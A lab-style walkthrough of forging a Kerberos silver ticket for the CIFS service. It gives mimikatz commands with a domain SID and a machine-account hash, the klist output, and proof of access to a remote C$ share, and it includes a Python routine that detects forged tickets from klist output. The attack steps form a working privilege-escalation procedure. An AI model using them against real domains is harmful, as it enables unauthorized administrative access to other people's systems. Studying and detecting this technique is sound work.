Silver Ticket for CIFS

First, from WebServer, check whether the administrative share on USER-SERVER can be reached:

C:\Users\adminwebserver>dir \\USER-SERVER.spartancybersec.corp\c$
Access is denied.

C:\Users\adminwebserver>hostname
WebServer

C:\Users\adminwebserver>whoami
spartancybersec\adminwebserver

C:\Users\adminwebserver>ipconfig

Windows IP Configuration
Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix  . : spartancybersec.corp
   Link-local IPv6 Address . . . . . : fe80::3dce:ac79:a1b0:7820%14
   IPv4 Address. . . . . . . . . . . : 10.0.1.249
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1

The output above shows that from WEBSERVER.spartancybersec.corp we do NOT have access to the C$ share on USER-SERVER.spartancybersec.corp. The host itself is reachable (it answers with "Access is denied" rather than a network error); the problem is that adminwebserver has no rights on that server.

We are going to forge a silver ticket for the CIFS service on USER-SERVER. For that we need:

  • The domain SID (the SID printed by whoami /user on any domain-joined host, without the trailing RID).

  • The NTLM hash of USER-SERVER's machine account (USER-SERVER$). CIFS on that host runs under the computer account, and the NT hash is that account's RC4-HMAC long-term key, which is what the service ticket must be encrypted with.

The command is the following. mimikatz uses the kerberos::golden module for both ticket types: with /target and /service it produces a silver ticket, even though the output still says "Golden ticket". /rc4 takes the machine account's NT hash and /ptt injects the resulting ticket into the current logon session:

C:\Users\Public\TOOLS>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::golden /user:Administrator /domain:spartancybersec.corp /sid:S-1-5-21-1861162130-2580302541-221646211 /target:USER-SERVER.spartancybersec.corp /rc4:dadef894e564c991a5a5714e0a7efc67 /service:CIFS /ptt
User      : Administrator
Domain    : spartancybersec.corp (SPARTANCYBERSEC)
SID       : S-1-5-21-1861162130-2580302541-221646211
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: dadef894e564c991a5a5714e0a7efc67 - rc4_hmac_nt
Service   : CIFS
Target    : USER-SERVER.spartancybersec.corp
Lifetime  : 11/23/2023 7:14:27 PM ; 11/20/2033 7:14:27 PM ; 11/20/2033 7:14:27 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ spartancybersec.corp' successfully submitted for current session

mimikatz # exit
Bye!

After that, we can confirm that the ticket now sits in the cache of the current logon session. Note the telltale signs of a forged ticket in the output below: "Kdc Called" is empty because no DC ever issued it, the lifetime is ten years (mimikatz's default) instead of the domain default of ten hours, the encryption type is RC4-HMAC, and the cache holds a service ticket without any TGT:

C:\Users\Public\TOOLS>klist

Current LogonId is 0:0xae5fb

Cached Tickets: (1)

#0>     Client: Administrator @ spartancybersec.corp
        Server: CIFS/USER-SERVER.spartancybersec.corp @ spartancybersec.corp
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 11/23/2023 19:14:27 (local)
        End Time:   11/20/2033 19:14:27 (local)
        Renew Time: 11/20/2033 19:14:27 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:
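The klist output above, run through a small detection routine. This is an added example written for this page, not part of the original write-up or of any Microsoft tooling: it parses klist text into one record per cached ticket and reports the indicators of an injected ticket (no KDC recorded, lifetime beyond the default MaxTicketAge of 10 hours, RC4-HMAC encryption, and a service ticket present with no krbtgt TGT). The sample is the page's own klist output embedded as a constructed string; the 10-hour threshold is the Windows default and would be read from the domain's Kerberos policy in a real check.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: the klist output shown on this page, as copied from the
# WebServer session. Not a live capture.
SAMPLE_KLIST = """
Current LogonId is 0:0xae5fb

Cached Tickets: (1)

#0>     Client: Administrator @ spartancybersec.corp
        Server: CIFS/USER-SERVER.spartancybersec.corp @ spartancybersec.corp
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 11/23/2023 19:14:27 (local)
        End Time:   11/20/2033 19:14:27 (local)
        Renew Time: 11/20/2033 19:14:27 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:
"""

# Windows default for "Maximum lifetime for service ticket" is 600 minutes.
# Assumed here; read it from the actual domain policy in production.
MAX_TICKET_AGE = timedelta(hours=10)


def parse_klist(text: str) -> list[dict]:
    """Split klist output into one dict of field -> value per cached ticket."""
    tickets = []
    for chunk in re.split(r"^#\d+>", text, flags=re.M)[1:]:
        fields = {}
        for line in chunk.strip().splitlines():
            line = line.strip()
            if line.startswith("Ticket Flags"):  # the only field printed without a colon
                fields["Ticket Flags"] = line[len("Ticket Flags"):].strip()
            else:
                key, _, value = line.partition(":")
                fields[key.strip()] = value.strip()
        tickets.append(fields)
    return tickets


def _parse_time(value: str) -> datetime:
    return datetime.strptime(value.replace("(local)", "").strip(), "%m/%d/%Y %H:%M:%S")


def forged_ticket_indicators(ticket: dict) -> list[str]:
    """Reasons a single cached ticket looks injected rather than KDC-issued."""
    reasons = []
    # A ticket requested from a KDC records the DC that issued it; /ptt leaves this blank.
    if not ticket.get("Kdc Called"):
        reasons.append("no KDC recorded: ticket was injected, not requested")
    lifetime = _parse_time(ticket["End Time"]) - _parse_time(ticket["Start Time"])
    if lifetime > MAX_TICKET_AGE:
        reasons.append(f"lifetime of {lifetime.days} days exceeds MaxTicketAge {MAX_TICKET_AGE}")
    # /rc4 yields an RC4-HMAC (etype 23) ticket; a domain with AES keys issues AES256 (etype 18).
    if "RC4" in ticket.get("KerbTicket Encryption Type", ""):
        reasons.append("RC4-HMAC ticket encryption where AES is expected")
    return reasons


def audit_cache(text: str) -> dict[str, list[str]]:
    """Map each cached ticket's SPN to its indicators, plus a cache-level finding
    when service tickets exist without the TGT that would normally precede them."""
    tickets = parse_klist(text)
    findings = {t["Server"]: forged_ticket_indicators(t) for t in tickets}
    if tickets and not any(t["Server"].startswith("krbtgt/") for t in tickets):
        findings["<cache>"] = ["service ticket(s) present without a TGT: consistent with a silver ticket"]
    return findings


if __name__ == "__main__":
    for spn, reasons in audit_cache(SAMPLE_KLIST).items():
        print(spn)
        for r in reasons:
            print("  -", r)
```

On the page's output every check fires. In a real environment the same logic runs against klist from each logon session (klist -li <LogonId>), and the RC4 and lifetime checks are also expressible as filters on DC event 4769 (TicketEncryptionType 0x17, and no 4768 preceding the 4769) once the forged ticket is used against USER-SERVER.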

And as the final result, the same dir command now succeeds. USER-SERVER accepts the ticket because it decrypts it with its own machine-account key and, by default, does not ask a DC to validate the PAC, so the forged memberships (512 Domain Admins, 519 Enterprise Admins, and so on) are taken at face value:

C:\Users\Public\TOOLS>dir \\USER-SERVER.spartancybersec.corp\c$
 Volume in drive \\USER-SERVER.spartancybersec.corp\c$ has no label.
 Volume Serial Number is 4C79-B015

 Directory of \\USER-SERVER.spartancybersec.corp\c$

11/14/2018  06:56 AM    <DIR>          EFI
05/13/2020  05:58 PM    <DIR>          PerfLogs
09/24/2022  03:51 AM    <DIR>          Program Files
09/19/2022  11:44 PM    <DIR>          Program Files (x86)
11/23/2023  07:10 PM    <DIR>          Users
11/13/2023  09:11 AM    <DIR>          Windows
               0 File(s)              0 bytes
               6 Dir(s)  14,095,360,000 bytes free
